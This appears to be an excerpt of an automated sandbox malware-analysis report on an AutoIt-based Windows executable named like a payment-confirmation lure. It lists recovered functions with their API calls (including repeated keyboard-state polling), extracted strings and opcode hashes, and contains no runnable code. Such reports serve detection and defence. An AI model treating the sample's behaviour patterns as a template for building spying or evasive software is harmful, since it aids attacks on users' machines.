                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,01353C64,00000010,00000000,Bad directive syntax error,0137DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 013232D1
                                          • LoadStringW.USER32(00000000,?,01353C64,00000010), ref: 013232D8
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • _wprintf.LIBCMT ref: 01323309
                                          • __swprintf.LIBCMT ref: 0132332B
                                          • MessageBoxW.USER32 ref: 01323395
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          APIs
                                          • GetSysColorBrush.USER32 ref: 012E2F8B
                                          • RegisterClassExW.USER32(00000030), ref: 012E2FB5
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 012E2FC6
                                          • InitCommonControlsEx.COMCTL32(?), ref: 012E2FE3
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 012E2FF3
                                          • LoadIconW.USER32 ref: 012E3009
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 012E3018
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 359a805a28be881a88b1c55da7d786cbb58f8144e33c16078b0a1a3e7938cbe4
                                          • Instruction ID: f8c5bb7a3510aaf75040e9303151fdd8e9f3abc6c11c55b13f5b5ac6f840cd2d
                                          • Opcode Fuzzy Hash: 359a805a28be881a88b1c55da7d786cbb58f8144e33c16078b0a1a3e7938cbe4
                                          • Instruction Fuzzy Hash: 6A21D0B5A00218AFDB209FA5E849B8EBFF8FB08744F00811AE665A6294D7B445448F91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                          • String ID:
                                          • API String ID: 3566271842-0
                                          • Opcode ID: 4d8a5ab89fe088c18a35a77b4c58dd373873869fe6827246d0464ea5211c6e5a
                                          • Instruction ID: c60e0e334b9c69e672a1982cde9b01d41380b7b1464769f79dfc984d34afcd74
                                          • Opcode Fuzzy Hash: 4d8a5ab89fe088c18a35a77b4c58dd373873869fe6827246d0464ea5211c6e5a
                                          • Instruction Fuzzy Hash: 76710D75A10119AFDB15DFA8C888ADEB7F8FF48314F048495E919AB261D734EE40CF94
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 01323908
                                          • SetKeyboardState.USER32(?), ref: 01323973
                                          • GetAsyncKeyState.USER32 ref: 01323993
                                          • GetKeyState.USER32(000000A0), ref: 013239AA
                                          • GetAsyncKeyState.USER32 ref: 013239D9
                                          • GetKeyState.USER32(000000A1), ref: 013239EA
                                          • GetAsyncKeyState.USER32 ref: 01323A16
                                          • GetKeyState.USER32(00000011), ref: 01323A24
                                          • GetAsyncKeyState.USER32 ref: 01323A4D
                                          • GetKeyState.USER32(00000012), ref: 01323A5B
                                          • GetAsyncKeyState.USER32 ref: 01323A84
                                          • GetKeyState.USER32(0000005B), ref: 01323A92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 9b4c0db931a55c101e44858462d75458173442910544f449f4393acf066af7f0
                                          • Instruction ID: a8ee8f5b35e0fcaaaa2949546f4e55b2d1062ef36852539901f9cdbd6f3bb890
                                          • Opcode Fuzzy Hash: 9b4c0db931a55c101e44858462d75458173442910544f449f4393acf066af7f0
                                          • Instruction Fuzzy Hash: AE51DC30A047A469FB35FBAC84107EABFF46F15648F08859DC6C25B1C2DB68974CC762
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 0131FB19
                                          • GetWindowRect.USER32(00000000,?), ref: 0131FB2B
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0131FB89
                                          • GetDlgItem.USER32(?,00000002), ref: 0131FB94
                                          • GetWindowRect.USER32(00000000,?), ref: 0131FBA6
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0131FBFC
                                          • GetDlgItem.USER32(?,000003E9), ref: 0131FC0A
                                          • GetWindowRect.USER32(00000000,?), ref: 0131FC1B
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0131FC5E
                                          • GetDlgItem.USER32(?,000003EA), ref: 0131FC6C
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0131FC89
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0131FC96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: b8196004a6ef407db15c9e6f1a09af4060791f30c08f40c17b7dc13c813e1cde
                                          • Instruction ID: b4fe657bd6d251749e147dbad41860079de7e4c4e18e46fa5bb784686c94832b
                                          • Opcode Fuzzy Hash: b8196004a6ef407db15c9e6f1a09af4060791f30c08f40c17b7dc13c813e1cde
                                          • Instruction Fuzzy Hash: 04511071B00205AFDF18CFADDD95AAEBBBAFB88314F548129FA16D7294D7709D048B10
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                          • String ID:
                                          • API String ID: 136442275-0
                                          • Opcode ID: 3f4696e658ab9c5069b40298f80fcbf4ffd83a3f1a18ad9293e3ec4abe924942
                                          • Instruction ID: 45afea8025d7714c02460a484750a8c1c741187c99534dda97e14d6caa8db7af
                                          • Opcode Fuzzy Hash: 3f4696e658ab9c5069b40298f80fcbf4ffd83a3f1a18ad9293e3ec4abe924942
                                          • Instruction Fuzzy Hash: DD41F17290012DAADB26EB54CC54EDE73BCBF58314F0041E6E519A2090EB75EBD4CFA4
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0134B204
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID: `"u
                                          • API String ID: 634782764-810275233
                                          • Opcode ID: 2396971077a7b1219d87892fc4040dec13aaefe08e3e839677c56a3412918c27
                                          • Instruction ID: 056ea6422ac35ab2af83d3e331827b773860ec153b00777acd9f8695881a57d6
                                          • Opcode Fuzzy Hash: 2396971077a7b1219d87892fc4040dec13aaefe08e3e839677c56a3412918c27
                                          • Instruction Fuzzy Hash: 9D519330600209BFEF319E6DCC88BAEBFE9AB06368F108515FA55D65B9C771F9508B50
                                          APIs
                                          • __swprintf.LIBCMT ref: 012E84E5
                                          • __itow.LIBCMT ref: 012E8519
                                            • Part of subcall function 01302177: _xtow@16.LIBCMT ref: 01302198
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf_xtow@16
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 1502193981-2263619337
                                          • Opcode ID: 360e72c1ae643b7127d7b52013c9a197922cb1b68e735ad2c6829deef3774251
                                          • Instruction ID: d1d72a562f8a77bb33d60b05472d5e8013202ae8cd4ea52afa56a4fd4d2c893a
                                          • Opcode Fuzzy Hash: 360e72c1ae643b7127d7b52013c9a197922cb1b68e735ad2c6829deef3774251
                                          • Instruction Fuzzy Hash: 6C412676610205DBEB25DF3CD845F6A7BE5FF44308F60446EE58AD6280EA71E641CB10
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$`"u
                                          • API String ID: 176399719-2270789441
                                          • Opcode ID: 38384160e53a8b007ea7d1740e7bc60a63586a2de42389eb249781b15c4af9ea
                                          • Instruction ID: 5fcfa7eb4f467719d608bd0735ffb49e82aa99a9003ba728954f7bb4b19d5b6b
                                          • Opcode Fuzzy Hash: 38384160e53a8b007ea7d1740e7bc60a63586a2de42389eb249781b15c4af9ea
                                          • Instruction Fuzzy Hash: EF417C75A00209EFEB20EFA8D848BDA7BF9FF49318F144058EA9597361D730A910CF60
                                          APIs
                                          • _memset.LIBCMT ref: 01305CCA
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • __gmtime64_s.LIBCMT ref: 01305D63
                                          • __gmtime64_s.LIBCMT ref: 01305D99
                                          • __gmtime64_s.LIBCMT ref: 01305DB6
                                          • __allrem.LIBCMT ref: 01305E0C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01305E28
                                          • __allrem.LIBCMT ref: 01305E3F
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01305E5D
                                          • __allrem.LIBCMT ref: 01305E74
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01305E92
                                          • __invoke_watson.LIBCMT ref: 01305F03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                          • Instruction ID: 92d3c94e3ff004f594907132ca44db61ac3f4c5f956df1319f48fab4cb6e4101
                                          • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                          • Instruction Fuzzy Hash: 3E71D672A01717ABEB16DE6CCC90BAB77E8AF10668F14823AE554D76C1E770D9408F90
                                          APIs
                                          • _memset.LIBCMT ref: 01325816
                                          • GetMenuItemInfoW.USER32 ref: 01325877
                                          • SetMenuItemInfoW.USER32 ref: 013258AD
                                          • Sleep.KERNEL32(000001F4), ref: 013258BF
                                          • GetMenuItemCount.USER32(?), ref: 01325903
                                          • GetMenuItemID.USER32(?,00000000), ref: 0132591F
                                          • GetMenuItemID.USER32(?,-00000001), ref: 01325949
                                          • GetMenuItemID.USER32(?,?), ref: 0132598E
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 013259D4
                                          • GetMenuItemInfoW.USER32 ref: 013259E8
                                          • SetMenuItemInfoW.USER32 ref: 01325A09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 878d7b92e56215d6448912bb852f3f7a3b941747b0880b8caf2abef232b02193
                                          • Instruction ID: eb8ec3b094696157cfa5cd28352e3d870e65cbc4deb17648b3419ea42da91c5f
                                          • Opcode Fuzzy Hash: 878d7b92e56215d6448912bb852f3f7a3b941747b0880b8caf2abef232b02193
                                          • Instruction Fuzzy Hash: 7C61A171A10269EFEB21EFA8C888AEE7FBCEB0531CF144059E541A7251D771AE05CB21
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 01323591
                                          • GetAsyncKeyState.USER32 ref: 01323612
                                          • GetKeyState.USER32(000000A0), ref: 0132362D
                                          • GetAsyncKeyState.USER32 ref: 01323647
                                          • GetKeyState.USER32(000000A1), ref: 0132365C
                                          • GetAsyncKeyState.USER32 ref: 01323674
                                          • GetKeyState.USER32(00000011), ref: 01323686
                                          • GetAsyncKeyState.USER32 ref: 0132369E
                                          • GetKeyState.USER32(00000012), ref: 013236B0
                                          • GetAsyncKeyState.USER32 ref: 013236C8
                                          • GetKeyState.USER32(0000005B), ref: 013236DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 12e0e8fb5f7bd0a4d0dcae09db19771a8d1affb7592ca096f83f97b84308dd23
                                          • Instruction ID: 6ab53e2467e9e62987a296eadf7afdd04d6df4022dc8df7163f53c51fe54794b
                                          • Opcode Fuzzy Hash: 12e0e8fb5f7bd0a4d0dcae09db19771a8d1affb7592ca096f83f97b84308dd23
                                          • Instruction Fuzzy Hash: E24129306047D9ADFF32676884443B5BEA97B0935CF048049D6C6477C3DBAC91C8CBA6
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0131A2AA
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 0131A2F5
                                          • VariantInit.OLEAUT32(?), ref: 0131A307
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0131A327
                                          • VariantCopy.OLEAUT32(?,?), ref: 0131A36A
                                          • SafeArrayUnaccessData.OLEAUT32(?,?,?), ref: 0131A37E
                                          • VariantClear.OLEAUT32(?), ref: 0131A393
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0131A3A0
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0131A3A9
                                          • VariantClear.OLEAUT32(?), ref: 0131A3BB
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0131A3C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: d061a7a24e965d38602658b8caf38e9777cb4262d3a358be769432baf188344e
                                          • Instruction ID: 70cb560e4eb9458e4fbbfd0ef20734b966090963f0bb125bd405f446232ddcb7
                                          • Opcode Fuzzy Hash: d061a7a24e965d38602658b8caf38e9777cb4262d3a358be769432baf188344e
                                          • Instruction Fuzzy Hash: 12412D71A00219AFCB15DFE8D8889EEBFB9FF48345F008465E542B7254DB70AA45CBA0
                                          APIs
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • CoInitialize.OLE32 ref: 0133B298
                                          • CoUninitialize.OLE32 ref: 0133B2A3
                                          • CoCreateInstance.OLE32(?,00000000,00000017,0136D8FC,?), ref: 0133B303
                                          • IIDFromString.OLE32(?,?), ref: 0133B376
                                          • VariantInit.OLEAUT32(?), ref: 0133B410
                                          • VariantClear.OLEAUT32(?), ref: 0133B471
                                          Strings
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: 61753009598a2dac7f91d7c96857a9a5e43c77ee6336819b9e3e78ef41dd6339
                                          • Instruction ID: 0d4bd453eb6a9bf5463ce15ea5897b8b7a021423f65b5df902f8d9c246ebca76
                                          • Opcode Fuzzy Hash: 61753009598a2dac7f91d7c96857a9a5e43c77ee6336819b9e3e78ef41dd6339
                                          • Instruction Fuzzy Hash: 86618B31204312AFD711DF58C888B6EFBE8EF88768F04451DF9899B294D770E944CB9A
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 013386F5
                                          • inet_addr.WSOCK32(?,?,?), ref: 0133873A
                                          • gethostbyname.WSOCK32(?), ref: 01338746
                                          • IcmpCreateFile.IPHLPAPI ref: 01338754
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 013387C4
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 013387DA
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0133884F
                                          • WSACleanup.WSOCK32 ref: 01338855
                                          Strings
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: c1172caebcdcf2fde1e7541a4a8c6adae667aeaa17d21909315e9ed363affc76
                                          • Instruction ID: eb129fba92af1c9e6c4b109f253208f8b4f1d4b052eaf98d5fa19d659510549b
                                          • Opcode Fuzzy Hash: c1172caebcdcf2fde1e7541a4a8c6adae667aeaa17d21909315e9ed363affc76
                                          • Instruction Fuzzy Hash: 3B51A931604301DFD721DF64DD48B2ABBE4EF88718F048569F696DB2A0DB74E801CB46
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                            • Part of subcall function 012FB736: GetCursorPos.USER32(000000FF), ref: 012FB749
                                            • Part of subcall function 012FB736: ScreenToClient.USER32(00000000,000000FF), ref: 012FB766
                                            • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB78B
                                            • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB799
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0134EB0E
                                          • ImageList_EndDrag.COMCTL32 ref: 0134EB14
                                          • ReleaseCapture.USER32 ref: 0134EB1A
                                          • SetWindowTextW.USER32(?,00000000,?,?,00000000,?,00000000), ref: 0134EBC2
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0134EBD5
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0134ECAE
                                          Strings
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$`"u
                                          • API String ID: 1924731296-1507146671
                                          • Opcode ID: 55e0035aa18c9005e1dc42c29a2545447bab2c31e8fc807c2f1a5aa9d157959e
                                          • Instruction ID: c29a087a3cf4e004fba4e6418d99d2f9e9c423ab18854b4d9cf3cdffe47fbea3
                                          • Opcode Fuzzy Hash: 55e0035aa18c9005e1dc42c29a2545447bab2c31e8fc807c2f1a5aa9d157959e
                                          • Instruction Fuzzy Hash: 8C51CE35214304AFD714EF64C859F6A7BE9FF88708F404A2CF685972E1CB74A904CB52
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0132EC1E
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0132EC94
                                          • GetLastError.KERNEL32 ref: 0132EC9E
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0132ED0B
                                          Strings
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: fe50cd25b83b3b9f9bf976383324ac1f95d68c97f20ca9dca1efdf491b47eb2a
                                          • Instruction ID: 401c888eefe8793ca131179711cd5be33a3cd6e4cc067803b57c3ee2545f6ce4
                                          • Opcode Fuzzy Hash: fe50cd25b83b3b9f9bf976383324ac1f95d68c97f20ca9dca1efdf491b47eb2a
                                          • Instruction Fuzzy Hash: 3A31A135A002299FDF11FFE9C94AABABBB8FF54708F148029E506D7391DA719941CB80
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0131C782
                                          • GetDlgCtrlID.USER32 ref: 0131C78D
                                          • GetParent.USER32 ref: 0131C7A9
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0131C7AC
                                          • GetDlgCtrlID.USER32 ref: 0131C7B5
                                          • GetParent.USER32(?), ref: 0131C7D1
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0131C7D4
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 313823418-1403004172
                                          • Opcode ID: 35fe77ad55add29e0cd9cdf1647315402310a42985757e17288760e78e09fb85
                                          • Instruction ID: 098ce5babd5bcb6837df9b58b6f300b8c3354ed66d3ed0ea18f4986f9ddbe1de
                                          • Opcode Fuzzy Hash: 35fe77ad55add29e0cd9cdf1647315402310a42985757e17288760e78e09fb85
                                          • Instruction Fuzzy Hash: D721C474A40208BFDF05EBA4CC94DBE7BA9EF56314F504115E552932E4DBB45825DB20
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0131C869
                                          • GetDlgCtrlID.USER32 ref: 0131C874
                                          • GetParent.USER32 ref: 0131C890
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0131C893
                                          • GetDlgCtrlID.USER32 ref: 0131C89C
